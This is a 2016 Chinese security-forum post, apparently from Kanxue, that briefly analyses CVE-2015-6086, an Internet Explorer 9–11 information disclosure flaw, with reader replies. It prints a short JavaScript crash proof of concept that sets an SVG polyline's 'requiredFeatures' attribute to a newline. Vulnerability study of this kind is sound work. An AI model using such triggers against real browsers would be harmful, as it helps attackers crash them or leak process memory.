首页
社区
课程
招聘
[原创]CVE-2015-6086 简要分析
发表于: 2016-4-27 14:42 7147

[原创]CVE-2015-6086 简要分析

2016-4-27 14:42
7147

自己学习过程中写的记录。。。
前言

    Microsoft Internet Explorer 9 through 11 allows remote attackers to obtain sensitive information from process memory via a crafted web site, aka "Internet Explorer Information Disclosure Vulnerability."

0x01 漏洞成因

测试环境:win7 x64   

IE10 10.0.9200.16521

漏洞crash POC如下

function trigger() {
    var polyLine = document.createElementNS('http://www.w3.org/2000/svg', 'polyline');
    polyLine.setAttributeNS(null, 'requiredFeatures', '\n');
} 

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

上传的附件:
收藏
免费 3
支持
分享
最新回复 (9)
雪    币: 6
活跃值: (19)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
谢谢楼主分享
2016-4-28 00:51
0
雪    币: 341
活跃值: (138)
能力值: ( LV7,RANK:110 )
在线值:
发帖
回帖
粉丝
3
好厉害。
2016-4-28 10:26
0
雪    币: 1036
活跃值: (1311)
能力值: ( LV3,RANK:35 )
在线值:
发帖
回帖
粉丝
4
前排观摩!!
2016-4-28 14:22
0
雪    币: 292
活跃值: (810)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
5
太感谢了!写的真的是太好了,最近就想看这样的文章!
2016-4-28 14:42
0
雪    币: 68
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
windows cve
2016-4-28 16:46
0
雪    币: 3840
活跃值: (1920)
能力值: ( LV5,RANK:70 )
在线值:
发帖
回帖
粉丝
7
楼主你好,我测试的版本是IE 10.0.9200.17457,当执行CStr::Set函数的时候,由于src='\0abcd'之类的,这个\0会导致Set函数复制停止,导致出现%00%00%00%00..这种情况,不知道你的版本有这种情况么?
2016-5-19 15:33
0
雪    币: 44
活跃值: (34)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
8
我没有测过这个版本的,建议你把dll反汇编进ida中看一下代码这个地方在17457版本下的实现。
2016-5-23 13:25
0
雪    币: 38
活跃值: (120)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
9
mark
2016-9-2 16:05
0
雪    币: 2
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
10
顶顶!!!
2016-9-4 16:58
0
游客
登录 | 注册 方可回帖
返回
//